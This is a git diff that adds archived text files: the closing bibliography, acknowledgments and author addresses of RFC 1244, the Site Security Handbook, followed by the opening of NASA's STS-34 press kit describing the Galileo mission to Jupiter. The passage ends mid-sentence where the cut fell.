Tweezers: + An Analysis of the Internet Virus of November 1988", + Massachusetts Institute of Technology, February 1989. + + Provides a detailed dissection of the worm program. The + paper discusses the major points of the worm program then + reviews strategies, chronology, lessons and open issues, + Acknowledgments; also included are a detailed appendix + on the worm program subroutine by subroutine, an + appendix on the cast of characters, and a reference section. + + [EISENBERG89] + Eisenberg, T., D. Gries, J. Hartmanis, D. Holcomb, + M. Lynn, and T. Santoro, "The Computer Worm", Cornell + University, 6 February 1989. + + A Cornell University Report presented to the Provost of the + University on 6 February 1989 on the Internet Worm. + + [GAO] + U.S. General Accounting Office, "Computer Security - Virus + Highlights Need for Improved Internet Management", United + States General Accounting Office, Washington, DC, 1989. + + This 36 page report (GAO/IMTEC-89-57), by the U.S. + Government Accounting Office, describes the Internet worm + and its effects. It gives a good overview of the various + U.S. agencies involved in the Internet today and their + concerns vis-a-vis computer security and networking. + + Available on-line on host nnsc.nsf.net, directory + pub, filename GAO_RPT; and on nis.nsf.net, directory nsfnet, + filename GAO_RPT.TXT. + + [REYNOLDS89] + The Helminthiasis of the Internet, RFC 1135, + USC/Information Sciences Institute, Marina del Rey, + CA, December 1989. + + This report looks back at the helminthiasis (infestation + with, or disease caused by parasitic worms) of the + Internet that was unleashed the evening of 2 November 1988. + This document provides a glimpse at the infection,its + festering, and cure. The impact of the worm on the Internet + community, ethics statements, the role of the news media, + + + +Site Security Policy Handbook Working Group [Page 94] + +RFC 1244 Site Security Handbook July 1991 + + + crime in the computer world, and future prevention is + discussed. A documentation review presents four publications + that describe in detail this particular parasitic computer + program. Reference and bibliography sections are also + included. Available on-line on host ftp.nisc.sri.com + directory rfc, filename rfc1135.txt. Also available on + host nis.nsf.net, directory RFC, filename RFC1135.TXT-1. + + [SEELEY89] + Seeley, D., "A Tour of the Worm", Proceedings of 1989 + Winter USENIX Conference, Usenix Association, San Diego, CA, + February 1989. + + Details are presented as a "walk thru" of this particular + worm program. The paper opened with an abstract, + introduction, detailed chronology of events upon the + discovery of the worm, an overview, the internals of the + worm, personal opinions, and conclusion. + + [SPAFFORD88] + Spafford, E., "The Internet Worm Program: An + Analysis", Computer Communication Review, Vol. 19, + No. 1, ACM SIGCOM, January 1989. Also issued as Purdue + CS Technical Report CSD-TR-823, 28 November 1988. + + Describes the infection of the Internet as a worm + program that exploited flaws in utility programs in + UNIX based systems. The report gives a detailed + description of the components of the worm program: + data and functions. Spafford focuses his study on two + completely independent reverse-compilations of the + worm and a version disassembled to VAX assembly language. + + [SPAFFORD89] + Spafford, G., "An Analysis of the Internet Worm", + Proceedings of the European Software Engineering + Conference 1989, Warwick England, September 1989. + Proceedings published by Springer-Verlag as: Lecture + Notes in Computer Science #387. Also issued + as Purdue Technical Report #CSD-TR-933. + + +8.5 National Computer Security Center (NCSC) + + All NCSC publications, approved for public release, are available + from the NCSC Superintendent of Documents. + + NCSC = National Computer Security Center + + + +Site Security Policy Handbook Working Group [Page 95] + +RFC 1244 Site Security Handbook July 1991 + + + 9800 Savage Road + Ft Meade, MD 20755-6000 + + CSC = Computer Security Center: + an older name for the NCSC + + NTISS = National Telecommunications and + Information Systems Security + NTISS Committee, National Security Agency + Ft Meade, MD 20755-6000 + + [CSC] + Department of Defense, "Password Management Guideline", + CSC-STD-002-85, 12 April 1985, 31 pages. + + The security provided by a password system depends on + the passwords being kept secret at all times. Thus, a + password is vulnerable to compromise whenever it is used, + stored, or even known. In a password-based authentication + mechanism implemented on an ADP system, passwords are + vulnerable to compromise due to five essential aspects + of the password system: 1) a password must be initially + assigned to a user when enrolled on the ADP system; + 2) a user's password must be changed periodically; + 3) the ADP system must maintain a 'password + database'; 4) users must remember their passwords; and + 5) users must enter their passwords into the ADP system at + authentication time. This guideline prescribes steps to be + taken to minimize the vulnerability of passwords in each of + these circumstances. + + [NCSC1] + NCSC, "A Guide to Understanding AUDIT in Trusted Systems", + NCSC-TG-001, Version-2, 1 June 1988, 25 pages. + + Audit trails are used to detect and deter penetration of + a computer system and to reveal usage that identifies + misuse. At the discretion of the auditor, audit trails + may be limited to specific events or may encompass all of + the activities on a system. Although not required by + the criteria, it should be possible for the target of the + audit mechanism to be either a subject or an object. That + is to say, the audit mechanism should be capable of + monitoring every time John accessed the system as well as + every time the nuclear reactor file was accessed; and + likewise every time John accessed the nuclear reactor + file. + + + + +Site Security Policy Handbook Working Group [Page 96] + +RFC 1244 Site Security Handbook July 1991 + + + [NCSC2] + NCSC, "A Guide to Understanding DISCRETIONARY ACCESS CONTROL + in Trusted Systems", NCSC-TG-003, Version-1, 30 September + 1987, 29 pages. + + Discretionary control is the most common type of access + control mechanism implemented in computer systems today. + The basis of this kind of security is that an individual + user, or program operating on the user's behalf, is + allowed to specify explicitly the types of access other + users (or programs executing on their behalf) may have to + information under the user's control. [...] Discretionary + controls are not a replacement for mandatory controls. In + any environment in which information is protected, + discretionary security provides for a finer granularity of + control within the overall constraints of the mandatory + policy. + + [NCSC3] + NCSC, "A Guide to Understanding CONFIGURATION MANAGEMENT + in Trusted Systems", NCSC-TG-006, Version-1, 28 March 1988, + 31 pages. + + Configuration management consists of four separate tasks: + identification, control, status accounting, and auditing. + For every change that is made to an automated data + processing (ADP) system, the design and requirements of the + changed version of the system should be identified. The + control task of configuration management is performed + by subjecting every change to documentation, hardware, and + software/firmware to review and approval by an authorized + authority. Configuration status accounting is responsible + for recording and reporting on the configuration of the + product throughout the change. Finally, though the process + of a configuration audit, the completed change can be + verified to be functionally correct, and for trusted + systems, consistent with the security policy of the system. + + [NTISS] + NTISS, "Advisory Memorandum on Office Automation Security + Guideline", NTISSAM CONPUSEC/1-87, 16 January 1987, + 58 pages. + + This document provides guidance to users, managers, security + officers, and procurement officers of Office Automation + Systems. Areas addressed include: physical security, + personnel security, procedural security, hardware/software + security, emanations security (TEMPEST), and communications + + + +Site Security Policy Handbook Working Group [Page 97] + +RFC 1244 Site Security Handbook July 1991 + + + security for stand-alone OA Systems, OA Systems + used as terminals connected to mainframe computer systems, + and OA Systems used as hosts in a Local Area Network (LAN). + Differentiation is made between those Office Automation + Systems equipped with removable storage media only (e.g., + floppy disks, cassette tapes, removable hard disks) and + those Office Automation Systems equipped with fixed media + (e.g., Winchester disks). + +Additional NCSC Publications: + + [NCSC4] + National Computer Security Center, "Glossary of Computer + Security Terms", NCSC-TG-004, NCSC, 21 October 1988. + + [NCSC5] + National Computer Security Center, "Trusted + Computer System Evaluation Criteria", DoD 5200.28-STD, + CSC-STD-001-83, NCSC, December 1985. + + [NCSC7] + National Computer Security Center, "Guidance for + Applying the Department of Defense Trusted Computer System + Evaluation Criteria in Specific Environments", + CSC-STD-003-85, NCSC, 25 June 1985. + + [NCSC8] + National Computer Security Center, "Technical Rationale + Behind CSC-STD-003-85: Computer Security Requirements", + CSC-STD-004-85, NCSC, 25 June 85. + + [NCSC9] + National Computer Security Center, "Magnetic Remanence + Security Guideline", CSC-STD-005-85, NCSC, 15 November 1985. + + This guideline is tagged as a "For Official Use Only" + exemption under Section 6, Public Law 86-36 (50 U.S. Code + 402). Distribution authorized of U.S. Government agencies + and their contractors to protect unclassified technical, + operational, or administrative data relating to operations + of the National Security Agency. + + [NCSC10] + National Computer Security Center, "Guidelines for Formal + Verification Systems", Shipping list no.: 89-660-P, The + Center, Fort George G. Meade, MD, 1 April 1990. + + + + + +Site Security Policy Handbook Working Group [Page 98] + +RFC 1244 Site Security Handbook July 1991 + + + [NCSC11] + National Computer Security Center, "Glossary of Computer + Security Terms", Shipping list no.: 89-254-P, The Center, + Fort George G. Meade, MD, 21 October 1988. + + [NCSC12] + National Computer Security Center, "Trusted UNIX Working + Group (TRUSIX) rationale for selecting access control + list features for the UNIX system", Shipping list no.: + 90-076-P, The Center, Fort George G. Meade, MD, 1990. + + [NCSC13] + National Computer Security Center, "Trusted Network + Interpretation", NCSC-TG-005, NCSC, 31 July 1987. + + [NCSC14] + Tinto, M., "Computer Viruses: Prevention, Detection, and + Treatment", National Computer Security Center C1 + Technical Report C1-001-89, June 1989. + + [NCSC15] + National Computer Security Conference, "12th National + Computer Security Conference: Baltimore Convention Center, + Baltimore, MD, 10-13 October, 1989: Information Systems + Security, Solutions for Today - Concepts for Tomorrow", + National Institute of Standards and National Computer + Security Center, 1989. + + +8.6 Security Checklists + + [AUCOIN] + Aucoin, R., "Computer Viruses: Checklist for Recovery", + Computers in Libraries, Vol. 9, No. 2, Pg. 4, + 1 February 1989. + + [WOOD] + Wood, C., Banks, W., Guarro, S., Garcia, A., Hampel, V., + and H. Sartorio, "Computer Security: A Comprehensive Controls + Checklist", John Wiley and Sons, Interscience Publication, + 1987. + + +8.7 Additional Publications + + Defense Data Network's Network Information Center (DDN NIC) + + The DDN NIC maintains DDN Security bulletins and DDN Management + + + +Site Security Policy Handbook Working Group [Page 99] + +RFC 1244 Site Security Handbook July 1991 + + + bulletins online on the machine: NIC.DDN.MIL. They are available + via anonymous FTP. The DDN Security bulletins are in the + directory: SCC, and the DDN Management bulletins are in the + directory: DDN-NEWS. + + For additional information, you may send a message to: + NIC@NIC.DDN.MIL, or call the DDN NIC at: 1-800-235-3155. + + [DDN88] + Defense Data Network, "BSD 4.2 and 4.3 Software Problem + Resolution", DDN MGT Bulletin #43, DDN Network Information + Center, 3 November 1988. + + A Defense Data Network Management Bulletin announcement + on the 4.2bsd and 4.3bsd software fixes to the Internet + worm. + + [DDN89] + DCA DDN Defense Communications System, "DDN Security + Bulletin 03", DDN Security Coordination Center, + 17 October 1989. + + IEEE Proceedings + + [IEEE] + "Proceedings of the IEEE Symposium on Security + and Privacy", published annually. + + IEEE Proceedings are available from: + + Computer Society of the IEEE + P.O. Box 80452 + Worldway Postal Center + Los Angeles, CA 90080 + + Other Publications: + + Computer Law and Tax Report + Computers and Security + Security Management Magazine + Journal of Information Systems Management + Data Processing & Communications Security + SIG Security, Audit & Control Review + + + + + + + + +Site Security Policy Handbook Working Group [Page 100] + +RFC 1244 Site Security Handbook July 1991 + + +9. Acknowledgments + + Thanks to the SSPHWG's illustrious "Outline Squad", who assembled at + USC/Information Sciences Institute on 12-June-90: Ray Bates (ISI), + Frank Byrum (DEC), Michael A. Contino (PSU), Dave Dalva (Trusted + Information Systems, Inc.), Jim Duncan (Penn State Math Department), + Bruce Hamilton (Xerox), Sean Kirkpatrick (Unisys), Tom Longstaff + (CIAC/LLNL), Fred Ostapik (SRI/NIC), Keith Pilotti (SAIC), and Bjorn + Satdeva (/sys/admin, inc.). + + Many thanks to Rich Pethia and the Computer Emergency Response Team + (CERT); much of the work by Paul Holbrook was done while he was + working for CERT. Rich also provided a very thorough review of this + document. Thanks also to Jon Postel and USC/Information Sciences + Institute for contributing facilities and moral support to this + effort. + + Last, but NOT least, we would like to thank members of the SSPHWG and + Friends for their additional contributions: Vint Cerf (CNRI), + Dave Grisham (UNM), Nancy Lee Kirkpatrick (Typist Extraordinaire), + Chris McDonald (WSMR), H. Craig McKee (Mitre), Gene Spafford (Purdue), + and Aileen Yuan (Mitre). + +10. Security Considerations + + If security considerations had not been so widely ignored in the + Internet, this memo would not have been possible. + +11. Authors' Addresses + + J. Paul Holbrook + CICNet, Inc. + 2901 Hubbard + Ann Arbor, MI 48105 + + Phone: (313) 998-7680 + EMail: holbrook@cic.net + + + Joyce K. Reynolds + University of Southern California + Information Sciences Institute + 4676 Admiralty Way + Marina del Rey, CA 90292 + + Phone: (213) 822-1511 + EMail: JKREY@ISI.EDU + + + + +Site Security Policy Handbook Working Group [Page 101] + + + diff --git a/textfiles.com/computers/galileo.txt b/textfiles.com/computers/galileo.txt new file mode 100644 index 00000000..08af4a1c --- /dev/null +++ b/textfiles.com/computers/galileo.txt @@ -0,0 +1,2327 @@ +STS-34 PRESS KIT + + + +CONTENTS + +GALILEO +GALILEO MISSION EVENTS +EARTH TO JUPITER +VENUS +FIRST EARTH PASS +FIRST ASTEROID +SECOND EARTH PASS +SECOND ASTEROID +APPROACHING JUPITER +AT JUPITER + The probe at Jupiter + The orbiter at Jupiter +SCIENTIFIC ACTIVITIES + Spacecraft scientific activities + Probe scientific activities + Orbiter scientific activities +GROUND SYSTEMS +SPACECRAFT CHARACTERISTICS +JUPITER'S SYSTEM +WHY JUPITER INVESTIGATIONS ARE IMPORTANT +GALILEO MANAGEMENT +GALILEO ORBITER AND PROBE SCIENTIFIC INVESTIGATIONS +STS-34 INERTIAL UPPER STAGE (IUS-19) + Specifications + Airborne Support Equipment + IUS Structure + Equipment Support Section + IUS Avionics Subsystems + IUS Solid Rocket Motors + Reaction Control System + IUS to Spacecraft Interfaces + Flight Sequence +SHUTTLE SOLAR BACKSCATTER ULTRAVIOLET INSTRUMENT (SSBUV) +GROWTH HORMONE CONCENTRATIONS AND DISTRIBUTION IN PLANTS +POLYMER MORPHOLOGY + + + + +GENERAL RELEASE + +RELEASE: 89-151 + +SHUTTLE ATLANTIS TO DEPLOY GALILEO PROBE TOWARD JUPITER + + + Space Shuttle mission STS-34 will deploy the Galileo planetary +exploration spacecraft into low-Earth orbit starting Galileo on its journey +to explore Jupiter. Galileo will be the second planetary probe deployed +from the Shuttle this year following Atlantis' successful launch of +Magellan toward Venus exploration in May. + + Following deployment about 6 hours after launch, Galileo will be +propelled on a trajectory, known as Venus-Earth-Earth Gravity Assist +(VEEGA) by an Air Force-developed, inertial upper stage (IUS). Galileo's +trajectory will swing around Venus, the sun and Earth before Galileo +makes it's way toward Jupiter. + + Flying the VEEGA track, Galileo will arrive at Venus in February 1990. +During the flyby, Galileo will make measurements to determine the +presence of lightning on Venus and take time-lapse photography of Venus' +cloud circulation patterns. Accelerated by Venus' gravity, the spacecraft +will head back to Earth. + + Enroute, Galileo will activate onboard remote-sensing equipment to +gather near-infrared data on the composition and characteristics of the +far side of Earth's moon. Galileo also will map the hydrogen distribution +of the Earth's atmosphere. + + Acquiring additional energy from the Earth's gravitational forces, +Galileo will travel on a 2-year journey around the sun spending 10 months +inside an asteroid belt. On Oct. 29, 1991, Galileo wlll pass within 600 +miles of the asteroid Gaspra. + + On the second Earth flyby in December 1992, Galileo will photograph +the north pole of the moon in an effort to determine if ice exists. +Outbound, Galileo will activate the time-lapse photography system to +produce a "movie" of the moon orbiting Earth. + + Racing toward Jupiter, Galileo will make a second trek through the + + + + + + +asteroid belt passing within 600 miles of asteroid Ida on Aug. 29, 1993. +Science data gathered from both asteroid encounters will focus on surface +geology and composition. + + Five months prior to the Dec. 7, 1995, arrival at Jupiter, Galileo's +atmospheric probe, encased in an oval heat shield, will spin away from the +orbiter at a rate of 5 revolutions per minute (rpm) and follow a ballistic +trajectory aimed at a spot 6 degrees north of Jupiter's equator. The probe +will enter Jupiter's atmosphere at a shallow angle to avoid burning up like +a meteor or ricocheting off the atmosphere back into space. + + At approximately Mach 1 speed, the probe's pilot parachute will deploy, +removing the deceleration module aft cover. Deployment of the main +parachute will follow, pulling the descent module out of the aeroshell to +expose the instrument-sensing elements. During the 75-minute descent +into the Jovian atmosphere, the probe will use the orbiter to transmit +data back to Earth. After 75 minutes, the probe will be crushed under the +heavy atmospheric pressure. + + The Galileo orbiter will continue its primary mission, orbiting around +Jupiter and four of its satellites, returning science data for the next 22 +months. + + Galileo's scientific goals include the study of the chemical +composition, state and dynamics of the Jovian atmosphere and satellites, +and the investigation of the structure and physical dynamics of the +powerful Jovian magnetosphere. + + Overall responsibility for management of the project, including orbiter +development, resides at NASA's Jet Propulsion Laboratory, Pasadena, +Calif. The NASA Ames Research Center, Mountain View, Calif., manages +the probe system. JPL built the 2,500-lb. spacecraft and Hughes Aircraft +Co. built the 740-lb. probe. + + Modifications made to Galileo since flight postponement in 1986 +include the addition of sunshields to the base and top of the antenna, new +thermal control surfaces, blankets and heaters. Because of the extended +length of the mission, the electrical circuitry of the thermoelectric +generator has been revised to reduce power demand throughout the +mission to assure adequate power supply for mission completion. + + Joining Galileo in the payload bay of Atlantis will be the Shuttle Solar +Backscatter Ultraviolet (SSBUV) instrument. The SSBUV is designed to +provide calibration of backscatter ultraviolet instruments currently being +flown on free-flying satellites. SSBUV's primary objective is to check the +calibration of the ozone sounders on satellites to verify the accuracy of +the data set of atmospheric ozone and solar irradiance data. + + The SSBUV is contained in two Get Away Special canisters in the +payload bay and weighs about 1219 lbs . One canister contains the SSBUV +spectrometer and five supporting optical sensors. The second canister +houses data, command and power systems. An interconnecting cable +provides the communication link between the two canisters. + + + + The Galileo probe arrived at the Spacecraft Assembly and +Encapsulation Facility (SAEF) 2 on April 17 and the spacecraft arrived on +May 16. While at SAEF-2, the spacecraft and probe were joined and tested +together to verify critical connections. Galileo was delivered to the +Vertical Processing Facility (VPF) on Aug. 1. The Inertial Upper Stage +(IUS) was delivered to the VPF on July 30. The Galileo/IUS were joined +together on Aug. 3 and all integrated testing was performed during the +second week of August. + + + +GALILEO + + Galileo is a NASA spacecraft mission to Jupiter to study the planet's +atmosphere, satellites and surrounding magnetosphere. It was named for +the Italian renaissance scientist who discovered Jupiter's major moons by +using the first astronomical telescope. + + This mission will be the first to make direct measurements from an +instrumented probe within Jupiter's atmosphere and the first to conduct +long-term observations of the planet and its magnetosphere and satellites +from orbit around Jupiter. It will be the first orbiter and atmospheric +probe for any of the outer planets. On the way to Jupiter, Galileo also will +observe Venus, the Earth-moon system, one or two asteroids and various +phenomena in interplanetary space. + + Galileo will be boosted into low-Earth orbit by the Shuttle Atlantis and +then boosted out of Earth orbit by a solid rocket Inertial Upper Stage. The +spacecraft will fly past Venus and twice by the Earth, using gravity +assists from the planets to pick up enough speed to reach Jupiter. Travel +time from launch to Jupiter is a little more than 6 years. + + In December 1995, the Galileo atmospheric probe will conduct a brief, +direct examination of Jupiter's atmosphere, while the larger part of the +craft, the orbiter, begins a 22-month, 10-orbit tour of major satellites +and the magnetosphere, including long-term observations of Jupiter +throughout this phase. + + The 2-ton Galileo orbiter spacecraft carries 9 scientific instruments. +There are another six experiments on the 750-pound probe. The spacecraft +radio link to Earth serves as an additional instrument for scientific +measurements. The probe's scientific data will be relayed to Earth by the +orbiter during the 75-minute period while the probe is descending into +Jupiter's atmosphere. Galileo will communicate with its controllers and +scientists through NASAUs Deep Space Network, using tracking stations in +California, Spain and Australia. + + + +GALILEO MISSION EVENTS + +Launch Window (Atlantis and IUS).....................Oct. 12 to Nov. 21, 1989 +(Note: for both asteroids, closes in mid-October) +Venus flyby ( 9,300 mi).............................*Feb. 9, 1990 +Venus data playback..................................Oct. 1990 +Earth 1 flyby ( about 600 mi).......................*Dec. 8, 1990 +Asteroid Gaspra flyby (600 mi)......................*Oct. 29, 1991 +Earth 2 flyby (200 mi)..............................*Dec. 8, 1992 +Asteroid Ida flyby (600 mi).........................*Aug. 28, 1993 +Probe release........................................July 1995 +Jupiter arrival......................................Dec. 7, 1995 +(includes Io flyby, probe entry and relay, Jupiter orbit insertion) +Orbital tour of Galilean satellites Dec '95-Oct '97 + +*Exact dates may vary according to actual launch date + + + + +EARTH TO JUPITER + + + + Galileo will make three planetary encounters in the course of its +gravity-assisted flight to Jupiter. These provide opportunities for +scientific observation and measurement of Venus and the Earth-moon +system. The mission also has a chance to fly close to one or two +asteroids, bodies which have never been observed close up, and obtain data +on other phenomena of interplanetary space. + + Scientists are currently studying how to use the Galileo scientific +instruments and the limited ability to collect, store and transmit data + + + + + + +during the early phase of flight to make the best use of these +opportunities. Instruments designed to observe Jupiter's atmosphere from +afar can improve our knowledge of the atmosphere of Venus and sensors +designed for the study of Jupiter's moons can add to our information about +our own moon. + + + + +VENUS + + The Galileo spacecraft will approach Venus early in 1990 from the +night side and pass across the sunlit hemisphere, allowing observation of +the clouds and atmosphere. Both infrared and ultraviolet spectral +observations are planned, as well as several camera images and other +remote measurements. The search for deep cloud patterns and for +lightning storms will be limited by the fact that all the Venus data must +be tape-recorded on the spacecraft for playback 8 months later. + + The spacecraft was originally designed to operate between Earth and +Jupiter, where sunlight is 25 times weaker than at Earth and +temperatures are much lower. The VEEGA mission will expose the +spacecraft to a hotter environment from Earth to Venus and back. +Spacecraft engineers devised a set of sunshades to protect the craft. For +this system to work, the front end of the spacecraft must be aimed +precisely at the Sun, with the main antenna furled for protection from the +Sun's rays until after the first Earth flyby in December 1990. This +precludes the use of the Galileo high-gain antenna and therefore, +scientists must wait until the spacecraft is close to Earth to receive the +recorded Venus data, transmitted through a low-gain antenna. + + + +FIRST EARTH PASS + + Approaching Earth for the first time about 14 months after launch, the +Galileo spacecraft will observe, from a distance, the nightside of Earth +and parts of both the sunlit and unlit sides of the moon. After passing +Earth, Galileo will observe Earth's sunlit side. At this short range, +scientific data are transmitted at the high rate using only the +spacecraft's low-gain antennas. The high-gain antenna is to be unfurled +like an umbrella, and its high-power transmitter turned on and checked +out, about 5 months after the first Earth encounter. + + + +FIRST ASTEROID + + Nine months after the Earth passage and still in an elliptical solar +orbit, Galileo will enter the asteroid belt, and two months later, will have +its first asteroid encounter. Gaspra is believed to be a fairly +representative main-belt asteroid, about 10 miles across and probably +similar in composition to stony meteorites. + + + + + + + + The spacecraft will pass within about 600 miles at a relative speed of +about 18,000 miles per hour. It will collect several pictures of Gaspra +and make spectral measurements to indicate its composition and physical +properties. + + + + +SECOND EARTH PASS + + Thirteen months after the Gaspra encounter, the spacecraft will have +completed its 2-year elliptical orbit around the Sun and will arrive back +at Earth. It will need a much larger ellipse (with a 6-year period) to reach +as far as Jupiter. The second flyby of Earth will pump the orbit up to that +size, acting as a natural apogee kick motor for the Galileo spacecraft. + + Passing about 185 miles above the surface, near the altitude at which +it had been deployed from the Space Shuttle almost three years earlier, +Galileo will use Earth's gravitation to change the spacecraft's flight +direction and pick up about 8,000 miles per hour in speed. + + Each gravity-assist flyby requires about three rocket-thrusting +sessions, using Galileo's onboard retropropulsion module, to fine-tune the +flight path. The asteroid encounters require similar maneuvers to obtain +the best observing conditions. + + Passing the Earth for the last time, the spacecraft's scientific +equipment will make thorough observations of the planet, both for +comparison with Venus and Jupiter and to aid in Earth studies. If all goes +well, there is a good chance that Galileo will enable scientists to record +the motion of the moon about the Earth while the Earth itself rotates. + + + + +SECOND ASTEROID + + Nine months after the final Earth flyby, Galileo may have a second +asteroid-observing opportunity. Ida is about 20 miles across. Like +Gaspra, Ida is believed to represent the majority of main-belt asteroids in +composition, though there are believed to be differences between the two. +Relative velocity for this flyby will be nearly 28,000 miles per hour, with +a planned closest approach of about 600 miles. + + + +APPROACHING JUPITER + + Some 2 years after leaving Earth for the third time and 5 months +before reaching Jupiter, Galileo's probe must separate from the orbiter. +The spacecraft turns to aim the probe precisely for its entry point in the +Jupiter atmosphere, spins up to 10 revolutions per minute and releases +the spin-stabilized probe. Then the Galileo orbiter maneuvers again to +aim for its own Jupiter encounter and resumes its scientific +measurements of the interplanetary environment underway since the +launch more than 5 years before. + + While the probe is still approaching Jupiter, the orbiter will have its +first two satellite encounters. After passing within 20,000 miles of +Europa, it will fly about 600 miles above Io's volcano-torn surface, +twenty times closer than the closest flyby altitude of Voyager in 1979. + + + + +AT JUPITER + + +The Probe at Jupiter + + The probe mission has four phases: launch, cruise, coast and +entry-descent. During launch and cruise, the probe will be carried by the +orbiter and serviced by a common umbilical. The probe will be dormant +during cruise except for annual checkouts of spacecraft systems and +instruments. During this period, the orbiter will provide the probe with +electric power, commands, data transmission and some thermal control. + + Six hours before entering the atmosphere, the probe will be shooting +through space at about 40,000 mph. At this time, its command unit +signals "wake up" and instruments begin collecting data on lightning, radio +emissions and energetic particles. + + A few hours later, the probe will slam into Jupiter's atmosphere at +115,000 mph, fast enough to jet from Los Angeles to New York in 90 +seconds. Deceleration to about Mach 1 -- the speed of sound -- should +take just a few minutes. At maximum deceleration as the craft slows +from 115,000 mph to 100 mph, it will be hurtling against a force 350 +times Earth's gravity. The incandescent shock wave ahead of the probe +will be as bright as the sun and reach searing temperatures of up to +28,000 degrees Fahrenheit. After the aerodynamic braking has slowed the +probe, it will drop its heat shields and deploy its parachute. This will +allow the probe to float down about 125 miles through the clouds, passing +from a pressure of 1/10th that on Earth's surface to about 25 Earth +atmospheres. + + About 4 minutes after probe entry into JupiterUs atmosphere, a pilot +chute deploys and explosive nuts shoot off the top section of the probe's +protective shell. As the cover whips away, it pulls out and opens the main +parachute attached to the inner capsule. What remains of the probe's +outer shell, with its massive heat shield, falls away as the parachute +slows the instrument module. + + From there on, suspended from the main parachute, the probe's capsule +with its activated instruments floats downward toward the bright clouds +below. + + The probe will pass through the white cirrus clouds of ammonia +crystals - the highest cloud deck. Beneath this ammonia layer probably lie +reddish-brown clouds of ammonium hydrosulfides. Once past this layer, +the probe is expected to reach thick water clouds. This lowest cloud layer +may act as a buffer between the uniformly mixed regions below and the +turbulent swirl of gases above. + + Jupiter's atmosphere is primarily hydrogen and helium. For most of its +descent through Jupiter's three main cloud layers, the probe will be +immersed in gases at or below room temperature. However, it may +encounter hurricane winds up to 200 mph and lightning and heavy rain at +the base of the water clouds believed to exist on the planet. Eventually, +the probe will sink below these clouds, where rising pressure and +temperature will destroy it. The probe's active life in Jupiter's +atmosphere is expected to be about 75 minutes in length. The probe +batteries are not expected to last beyond this point, and the relaying +orbiter will move out of reach. + + To understand this huge gas planet, scientists must find out about its +chemical components and the dynamics of its atmosphere. So far, +scientific data are limited to a two-dimensional view (pictures of the +planet's cloud tops) of a three-dimensional process (Jupiter's weather). +But to explore such phenomena as the planet's incredible coloring, the +Great Red Spot and the swirling shapes and high-speed motion of its +topmost clouds, scientists must penetrate Jupiter's visible surface and +investigate the atmosphere concealed in the deep-lying layers below. + + A set of six scientific instruments on the probe will measure, among +other things, the radiation field near Jupiter, the temperature, pressure, +density and composition of the planet's atmosphere from its first faint +outer traces to the hot, murky hydrogen atmosphere 100 miles below the +cloud tops. All of the information will be gathered during the probe's +descent on an 8-foot parachute. Probe data will be sent to the Galileo +Orbiter 133,000 miles overhead then relayed across the half billion miles +to Deep Space Network stations on Earth. + + To return its science, the probe relay radio aboard the orbiter must +automatically acquire the probe signal below within 50 seconds, with a +success probability of 99.5 percent. It must reacquire the signal +immediately should it become lost. + + To survive the heat and pressure of entry, the probe spacecraft is +composed of two separate units: an inner capsule containing the +scientific instruments, encased in a virtually impenetrable outer shell. +The probe weighs 750 pounds. The outer shell is almost all heat shield +material. + + +The Orbiter at Jupiter + + After releasing the probe, the orbiter will use its main engine to go +into orbit around Jupiter. This orbit, the first of 10 planned, will have a +period of about 8 months. A close flyby of Ganymede in July 1996 will +shorten the orbit, and each time the Galileo orbiter returns to the inner +zone of satellites, it will make a gravity-assist close pass over one or +another of the satellites, changing Galileo's orbit while making close +observations. These satellite encounters will be at altitudes as close as +125 miles above their surfaces. Throughout the 22-month orbital phase, +Galileo will continue observing the planet and the satellites and continue +gathering data on the magnetospheric environment. + + + +SCIENTIFIC ACTIVITIES + + Galileo's scientific experiments will be carried out by more than 100 +scientists from six nations. Except for the radio science investigation, +these are supported by dedicated instruments on the Galileo orbiter and +probe. NASA has appointed 15 interdisciplinary scientists whose studies +include data from more than one Galileo instrument. + + The instruments aboard the probe will measure the temperatures and +pressure of Jupiter's atmosphere at varying altitudes and determine its +chemical composition including major and minor constituents (such as +hydrogen, helium, ammonia, methane, and water) and the ratio of hydrogen +to helium. Jupiter is thought to have a bulk composition similar to that of +the primitive solar nebula from which it was formed. Precise +determination of the ratio of hydrogen to helium would provide an +important factual check of the Big Bang theory of the genesis of the +universe. + + Other probe experiments will determine the location and structure of +Jupiter's clouds, the existence and nature of its lightning, and the amount +of heat radiating from the planet compared to the heat absorbed from +sunlight. + + In addition, measurements will be made of Jupiter's numerous radio +emissions and of the high-energy particles trapped in the planet's +innermost magnetic field. These measurements for Galileo will be made +within a distance of 26,000 miles from Jupiter's cloud tops, far closer +than the previous closest approach to Jupiter by Pioneer 11. The probe +also will determine vertical wind shears using Doppler radio +measurements made of probe motions from the radio receiver aboard the +orbiter. + + Jupiter appears to radiate about twice as much energy as it receives +from the sun and the resulting convection currents from Jupiter's internal +heat source towards its cooler polar regions could explain some of the +planet's unusual weather patterns. + + Jupiter is over 11 times the diameter of Earth and spins about two and +one-half times faster -- a jovian day is only 10 hours long. A point on the +equator of Jupiter's visible surface races along at 28,000 mph. This rapid +spin may account for many of the bizarre circulation patterns observed on +the planet. + + +Spacecraft Scientific Activities + + The Galileo mission and systems were designed to investigate three +broad aspects of the Jupiter system: the planet's atmosphere, the +satellites and the magnetosphere. The spacecraft is in three segments to +focus on these areas: the atmospheric probe; a non-spinning section of the +orbiter carrying cameras and other remote sensors; and the spinning main +section of the orbiter spacecraft which includes the propulsion module, +the communications antennas, main computers and most support systems +as well as the fields and particles instruments, which sense and measure +the environment directly as the spacecraft flies through it. + + +Probe Scientific Activities + + The probe will enter the atmosphere about 6 degrees north of the +equator. The probe weighs just under 750 pounds and includes a +deceleration module to slow and protect the descent module, which +carries out the scientific mission. + + The deceleration module consists of an aeroshell and an aft cover +designed to block the heat generated by slowing from the probe's arrival +speed of about 115,000 miles per hour to subsonic speed in less than 2 +minutes. After the covers are released, the descent module deploys its +8-foot parachute and its instruments, the control and data system, and +the radio-relay transmitter go to work. + + Operating at 128 bits per second, the dual L-band transmitters send +nearly identical streams of scientific data to the orbiter. The probe's +relay radio aboard the orbiter will have two redundant receivers that +process probe science data, plus radio science and engineering data for +transmission to the orbiter communications system. Minimum received +signal strength is 31 dBm. The receivers also measure signal strength and +Doppler shift as part of the experiments for measuring wind speeds and +atmospheric absorption of radio signals. + + Probe electronics are powered by long-life, high-discharge-rate +34-volt lithium batteries, which remain dormant for more than 5 years +during the journey to Jupiter. The batteries have an estimated capacity of +about 18 amp-hours on arrival at Jupiter. + + +Orbiter Scientific Activities + + The orbiter, in addition to delivering the probe to Jupiter and relaying +probe data to Earth, will support all the scientific investigations of +Venus, the Earth and moon, asteroids and the interplanetary medium, +Jupiter's satellites and 